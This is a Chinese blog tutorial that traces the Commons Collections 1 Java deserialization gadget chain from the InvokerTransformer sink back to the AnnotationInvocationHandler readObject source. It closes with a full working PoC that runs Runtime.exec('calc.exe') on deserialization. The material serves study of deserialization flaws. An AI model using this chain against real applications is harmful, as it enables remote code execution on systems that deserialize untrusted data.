Java代码审计&原生反序列化&CC链跟踪分析

置顶 已于 2024-01-24 08:20:35 修改
阅读量1.6k 收藏 20
点赞数 45
分类专栏: 代码审计 文章标签: Java 代码审计 CC链 反序列化
于 2024-01-24 08:16:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46081990/article/details/135805910
版权

希望和各位大佬一起学习,如果文章内容有错请多多指正,谢谢!  

个人博客链接:CH4SER的个人BLOG – Welcome To Ch4ser's Blog


在前一篇文章我分析了Commons Collections1链​​​​​​​,其中跟链的顺序是:source=>gadget=>sink,但如果站在漏洞挖掘的角度顺序是倒过来的:sink=>gadget=>source,即先找到造成命令执行的恶意类,然后通过该类倒一直倒推到可利用的反序列类。

本篇文章将按照sink=>gadget=>source的顺序,在挖洞的角度跟踪分析Commons Collections链

环境:Commons Collections 3.1 && jdk8u65

首先来到InvokerTransformer类,以下列出该类的构造函数和transform方法。

构造函数接收并设置三个参数:methodName、paramTypes、args

transform方法接收一个对象input,结合三个参数通过反射获取对象的类、方法,然后invoke调用执行(注意input不能为空)。

public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
    this.iMethodName = methodName;
    this.iParamTypes = paramTypes;
    this.iArgs = args;
}

public Object transform(Object input) {
    if (input == null) {
        return null;
    } else {
        try {
            Class cls = input.getClass();
            Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
            return method.invoke(input, this.iArgs);
        } catch (NoSuchMethodException var5) {
            throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' does not exist");
        } catch (IllegalAccessException var6) {
            throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
        } catch (InvocationTargetException var7) {
            throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' threw an exception", var7);
        }
    }
}

试想若按照以下代码逻辑实例化一个invokerTransformer对象,然后调用transform方法不就相当于Runtime.getRuntime().exec("calc")弹出计算器吗?

Runtime r = Runtime.getRuntime();

InvokerTransformer invokerTransformer = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"});

invokerTransformer.transform(r);

事实证明我们的猜想是正确的,如此一来便找到了sink执行点:InvokerTransformer#transform

由于InvokerTransformer类并不是可直接利用的反序列化类,所以还需要往前倒推,查找哪个类调用过transform方法。我们跟的是CC链,所以只需要关注Commons Collections 3.1包里的即可。

发现TransformedMap#checkSetValue方法调用过transform方法(正常情况下每个uasge都需要看)。

protected Object checkSetValue(Object value) {
        return valueTransformer.transform(value);
    }

试想若控制valueTransformer为InvokerTransformer类对象,执行valueTransformer.transform(value)那不就相当于执行InvokerTransformer#transform方法吗?

首先观察到valueTransformer在构造方法TransformedMap中设置,但由于该构造方法是protected类型无法直接访问,所以继续找有没有其他public类型方法调用过该构造方法。

观察到decorate方法调用过该构造方法TransformedMap,由此想到可以利用decorate方法间接控制valueTransformer,即控制decorate方法的传参valueTransformer=new InvokerTransformer(),那么执行decorate方法就会触发构造方法设置valueTransformer为InvokerTransformer类对象。

此时,若执行valueTransformer.transformer() = new InvokerTransformer().transformer()。

大致流程:

当执行TransformedMap.decorate(map, null, new InvokerTransformer())
=>

会触发TransformedMap(map, null, new InvokerTransformer())
=>

会设置valueTransformer = new InvokerTransformer()
=>

若执行valueTransformer.transformer()
=>

等于执行new InvokerTransformer().transformer()

到这里我们已经控制了valueTransformer为InvokerTransformer类对象,但还没成功触发checkSetValue方法,而且checkSetValue方法是protected类型无法直接调用,所以还需继续往上查找哪个类调用过checkSetValue方法。

发现AbstractInputCheckedMapDecorator#setValue方法调用过checkSetValue方法。

public Object setValue(Object value) {
            value = parent.checkSetValue(value);
            return entry.setValue(value);
        }

同理,若想要调用TransformedMap#checkSetValue方法,需控制parent为TransformedMap类对象。

此时若执行AbstractInputCheckedMapDecorator#setValue方法,就会触发执行parent.checkSetValue(value),等于执行new TransformedMap().checkSetValue(value),然后触发valueTransformer.transform(value),由于之前又控制valueTransformer为InvokerTransformer类对象,最终同执行new InvokerTransformer().transform(value),故又和sink点联系了起来。 

大致流程:

控制parent = new TransformedMap()
=>

当执行AbstractInputCheckedMapDecorator.setValue(Object value)
=>

会触发parent.checkSetValue(value)
=>

等于执行new TransformedMap().checkSetValue(value)
=>

会触发valueTransformer.transform(value)
=>

等于执行new InvokerTransformer().transform(value)

一般情况下,当继续往上找到的类重写的readObject方法里调用了前一个类的方法时,就是gadget结束。

比如这里继续查找哪个类调用过AbstractInputCheckedMapDecorator#setValue方法,发现AnnotationInvocationHandler#readObject方法里调用过。同理,此时应该控制var5=new AbstractInputCheckedMapDecorator(),才能调用AbstractInputCheckedMapDecorator#setValue方法,于是gadget结束同时也找到了source。

总结:无非就是让前面调用方法的类发生更改,控制其等于后面的类,让其调用后面类的方法 。

最后附上Poc代码:

package org.example;


import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;

public class CC1Poc {
    public static void main(String[] args) throws Exception {

        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] {"getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] {String.class }, new Object[] {"calc.exe"})
        };

        //将transformers数组存入ChaniedTransformer这个继承类(整个Runtime执行)
        Transformer transformerChain = new ChainedTransformer(transformers);

        //创建Map并绑定transformer
        Map innerMap = new HashMap();
        innerMap.put("value", "value");
        //给予map数据转化链
        Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);

        Class<?> c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor<?> declaredConstructor = c.getDeclaredConstructor(Class.class, Map.class);
        declaredConstructor.setAccessible(true);
        Object o = declaredConstructor.newInstance(Target.class, outerMap);


        //漏洞测试
        serializableObject(o);
        unserializableObject("ser.bin");
    }


    public static void serializableObject(Object o) throws Exception {
        FileOutputStream fileOutputStream = new FileOutputStream("ser.bin");
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(fileOutputStream);
        objectOutputStream.writeObject(o);
        objectOutputStream.close();
        fileOutputStream.close();
    }

    public static void unserializableObject(String filename) throws Exception{
        FileInputStream fileInputStream = new FileInputStream(filename);
        ObjectInputStream objectInputStream = new ObjectInputStream(fileInputStream);
        objectInputStream.readObject();
        objectInputStream.close();
        fileInputStream.close();
    }
}

学到这部分说实话还是比较吃力的,很多东西没有嚼透, 原因还是我的开发基础有点拉跨,打算等后面再重新好好学一下这部分。如果文章有错请多多指正,谢谢各位师傅支持!

Ch4ser
关注
  • 45
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 10
    评论
专栏目录
告别脚本小子系列丨JAVA安全(6)——反序列化利用(上)
xnxqwzy的博客
09-12 296
我们通常把反序列化漏洞和反序列化利用分开来看,有反序列化漏洞不一定有反序列化利用(经常用shiro反序列化工具的人一定遇到过一种场景就是找到了key,但是找不到gadget,这也就是在这种场景下没有可利用的反序列化利用)。如果我们向某个漏洞提交平台提交一个反序列化漏洞,但是不给反序列化利用,那么平台大概率是不会接受这种漏洞的。反序列化利用是整个反序列化利用过程中最关键的一环,通常反序列化利用需要借助常用的第三方jar包,其中最有名的就是CommonCollections利用(简称CC)。
红队专题-漏洞挖掘代码审计-RCE-反序列化
aming小老弟
03-14 1529
TransformedMap⽤于对Java标准数据结构Map做⼀个修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。super(map);
Java代码审计&Shiro反序列化&CB1&source入口&sink执行&gadget
qq_46081990的博客
01-22 1840
本文详细介绍了Shiro550 Commons BeanUtils反序列化利用,以代码审计的角度跟踪分析Commons BeanUtils的source、sink以及gadget,解释了该触发反序列化漏洞并最终造成RCE命令执行的根本原因是什么,并且在最后深入分析了Commons BeanUtilspayload的生成逻辑。
Java安全研究——反序列化漏洞之CC2
weixin_43889136的博客
05-10 1536
0x01
Java代码审计&Shiro反序列化&DNS利用&CC利用&AES动态调试
qq_46081990的博客
01-20 1197
本文首先介绍了Java原生反序列化及其漏洞产生的原因,然后以代码审计的角度深入分析了Shiro550生成及验证RememberMe Cookie的流程,总结了Shiro550反序列化漏洞产生的根本原因,测试了URLDNS,最后提出了一些思考
Java代码审计&FastJson反序列化&利用跟踪&动态调试&autoType绕过
qq_46081990的博客
01-16 1448
本文深入分析了FastJson历史版本漏洞的利用,使用IDEA动态跟踪调试,介绍了各版本不同CC的关键执行流程及对应Poc的构造思路,另外还介绍了针对FastJson不同版本防御手法的绕过思路等等。
java代码审计11之反序列化基础学习
划水的小白白
08-18 320
1、 序列化与反序列化 2、序列化与反序列化案例 2.1、使用idea生成代码与serialVersionUID 2.2、实例化对象 2.3、序列化对象 2.4、反序列化 3、稍微深入serialVersionUID 综上小结, 4、transient 作⽤ 5、反序列化漏洞 6、反序列化漏洞的理解 6.1、项目代码中,没有重写 readObject 方法,且反序列化的参数可控,可以造成漏洞吗 6.2、只有重写 readObject方法 才会造成反序列化漏洞吗 6.3、小结反序列化漏洞 之前的文章, php
Java反序列化漏洞与URLDNS利用分析
道阻且长,行则将至。
06-02 1034
本文从一个实际的 Java 反序列化 Demo 出发,学习反序列化漏洞的 Source 点特征、漏洞利用的必要条件,同时分析了 URLDNS 的原理,最后总结了 Java 反序列化漏洞的防御手段。
Java原生序列化和反序列化代码实例
08-25
总的来说,Java原生序列化和反序列化Java开发中常用的技术,用于持久化对象状态和在网络间传输对象。通过实现`Serializable`接口并在需要的地方调用`ObjectOutputStream`和`ObjectInputStream`的相关方法,我们...
java原生序列化和Kryo序列化性能实例对比分析
08-29
本文主要介绍了java原生序列化和Kryo序列化性能实例对比分析,涉及Java和kryo序列化和反序列化相关实例。下面是对标题、描述、标签和部分内容的详细说明: 1. 序列化概念:序列化是将对象转换为字节流的过程,以便...
Java反序列化实战.pdf
08-08
### Java反序列化实战知识点详解 #### 一、反序列化概述 - **定义**:在计算机科学领域,反序列化是指将字节流或文本流等数据转换回其原始对象结构的过程。这一过程通常与序列化相对应,序列化是将对象的状态转化...
深入理解Java原生的序列化机制
08-25
Java原生的序列化机制是指Java提供的一种对象序列化的机制,该机制中,一个对象可以被表示为一个字节序列,该字节序列包括该对象的数据、有关对象的类型的信息和存储在对象中数据的类型。对象序列化的过程是将对象...
136-浅谈Java原生反序列化漏洞.pdf
03-15
136-浅谈Java原生反序列化漏洞
城市生命线智慧管廊解决方案.pptx
最新发布
08-13
城市生命线智慧管廊解决方案.pptx
智慧园区综合管理平台系统解决方案-2.pptx
08-13
智慧园区综合管理平台系统解决方案-2.pptx
财务收支管理系统-出纳账.xlsm
08-13
工资表,财务报表,对账表,付款申请,财务报告,费用支出表,财务收支 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
Python3.0-3.3安装包合集
08-13
Python3.0-3.3安装包合集
机器人学中的状态估计+视觉slam14讲+自动驾驶与机器人中的slam技术
08-13
机器人学中的状态估计+视觉slam14讲+自动驾驶与机器人中的slam技术
c# 原生代码进行反序列化
07-13
在 C# 中,可以使用`System.Text.Json`或`Newtonsoft.Json`等库来进行 JSON 反序列化。下面是一个示例代码: 使用 `System.Text.Json` 库: ```csharp using System; using System.IO; using System.Text.Json; /...
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值